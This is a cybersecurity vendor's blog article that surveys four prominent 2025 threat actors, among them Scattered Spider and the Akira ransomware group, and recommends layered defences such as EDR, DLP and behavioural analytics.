The Top Cyber-threats Of 2025, And How To Combat Them

I was one of 12 cybersecurity leaders invited to take part in a recent IT Channel Oxygen article on the most memorable cyber-attacks of 2025 so far.

These cyber-attacks can only really be understood by examining the wider threat landscape and how it is evolving, however.

It’s fair to say that a new wave of threat actors and ransomware threats have come to the fore in 2025 (including some that target security professionals like us). Threat actors are innovative, well funded and well motivated.

Which amongst them have emerged as the biggest threat, and how should cyber providers like Sapphire be advising customers to combat them?

As news of yet another massive cyber-attack hits the headlines (this time at airline Qantas), here are four to look out for…

Scattered Spider – Retail predominantly recently

The retail industry has come under sustained and escalating attacks.

Scattered Spider historically targeted one sector at a time, often focusing on other victims within the sector as a result of a successful compromise. Recently, they have focused on retail and insurance, with the latest reports indicating a shift towards the aviation sector.

Their initial focus on the retail sector may be explained due to this sector being particularly vulnerable to customer pressure and negative publicity during service disruptions. Other contributing factors may be caused by lower levels of regulation when it comes to cyber defences, higher supply chain complexity and a higher workforce turnover workforce.

Scattered Spider are known for using spear-phishing, social engineering, and custom malware to infiltrate targets including using infostealer malware such as Lumma Stealer whose command infrastructure was recently disrupted through international law enforcement efforts with support from Microsoft.

The techniques used by Scattered Spider are diverse and continue to innovate but at their core their initial access strategy lies in their expertise and success in phishing, smishing and MFA exhaustion attacks. Once credentials and supporting information is gathered, they look to escalate their privileges through various methods such as targeting help desk personnel and then creating backdoor accesses and other accounts to evade detection and achieve their objectives.

Mitigation guidance focuses on a multi-faceted response that covers the cyber security hygiene of strong endpoint controls, cloud and infrastructure controls, detection and response capabilities, segregation of duties, encryption, back up etc but also the importance of human protections. Additionally, DLP (data loss prevention) solutions such as Microsoft Purview can assist with creating detections for this type of insider risk management and investments in UEBA (user entity behaviour analytics). You might want to have a read of this from Microsoft.

Scattered Spider represents an evolving and maturing threat actor tradecraft in 2025, where, in addition to malware deployment, there is a focus on manipulating human interactions, leveraging borrowed identities to exploit trust and achieve their goals. As we continue to digitise, we must continue to invest in our foundational technical and policy/procedural controls, technologies and defences but we must not forget the security of the perimeter means the security of identities.

Medusa – threat actor – active in retail and other consumer-facing businesses, as well as CNI and manufacturing.

Using techniques such as bring-your-own-vulnerable-driver, they have successfully bypassed some traditional endpoint detection capabilities to install their encryptor.

Ultimately, the threat actors are evolving new techniques and reinvigorating older ones to evade detection and implement their end goals.

This leads to needing to consider multiple layers of protection; EDR (endpoint detection and response) as a minimum. With 100,000s of successful ransomware attacks each year, many with top-tier, well-configured endpoint management in place, it’s clear that multiple layers of protection are needed.

Ransomware-focused protections working in harmony with broader EDR capabilities and combined telemetry from the rest of the security architecture is vital.

Anubis/Akira – The Akira ransomware has been observed with a new wiper module that means even if victims pay the ransom they will lose their data. It targets healthcare, hospitality and construction.

What’s interesting here is that the Ransomware-as-a-Service group has set up an affiliate model – meaning a share of the proceeds. Since February, they have been offering three models:

Traditional RaaS (Ransom-as-a-Service) affiliates receive 80% of the ransom,
A data ransom option (60% of ransom) where money is extorted after data exfiltration and
Access monetisation where already compromised victims are then further attacked and extorted (50% of ransom proceeds).

This shows a continued evolution in the ransomware model and the proliferation of attackers. These are criminal enterprises run like traditional business, expanding their channels to market, offering service wraps and helps desks.

Understanding an organisation’s attack surface, threat actor tradecraft and protecting the perimeter is part of the defensive posture needed to make you a less attractive target. Having XDR/EDR solution and processes in place that enable a fast response in terms of detecting and isolating host(s) with ransomware present as soon as possible.

This furthers the need for organisations to invest in automation if ransomware is detected and conduct automated responses such as automatically isolate/quarantine to minimise response times.

Water Curse – A recent threat actor group that is using weaponised GitHub repositories offering what appears to be legitimate pen-testing and security tools to deliver malware.

Clever huh…offering free security tooling to attack you with….who says criminals can’t be smart?

This is interesting as it is targeting security professionals, such as consultants and penetration testers, knowing that the community is open to sharing tooling and tradecraft legitimately in this way.

This tactic is similar to that used by threat actors targeting security professionals during fake ‘job interviews’. The ‘recruiter’ will provide the candidate with a link to a malicious code repo, under the guise of them completing a ‘coding challenge’, whereby the candidate unwittingly installs malware. The elevated risk of insider threat means there is a need for a multi-disciplinary cross-functional defence effort not always just limited to SOC and supply chain risk, often involves strengthening HR and recruitment processes too.

Implications – it boils down to social engineering. Partially mitigated with security awareness training and increased personnel vetting on both sides of the recruitment process.

So far this year I’d say these are the top four…ask me in six months’ time and I suspect Anubis will have gone up the rankings…and new, innovative attack vectors will be emerging…This return to data destruction is interesting and potentially devastating for organisations; these are extinction level-events, not just because of cost and distraction but the reputational damage.

It will mean some organisation will take years to recover, if they do ever (Hackney Council are still mopping up seven years after their well-publicised attack).

So what are the biggest risk areas for organisations, exploited by these attackers?

Insider threat – people remain the weakest link in the security chain. Train and awareness are essential but not enough, deploying DLP (data loss prevention) and UEBA (behavioural analytics) solutions provides a safety net.

Supply chain – disruption in the supply chain can be just as damaging, as can the software you use in your operation or the integrations you have built…how well do you know your suppliers, how well do you know their security?

Single layer protection – firewalls used to be enough, but haven’t been for a long time; endpoint protection, well configured and monitored 24×7 makes a big difference, but it’s no longer enough. Some form of UEBA and/or one of the emerging anti-ransomware solutions is increasingly necessary for-high profile sectors such as retail, healthcare, CNI and financial services.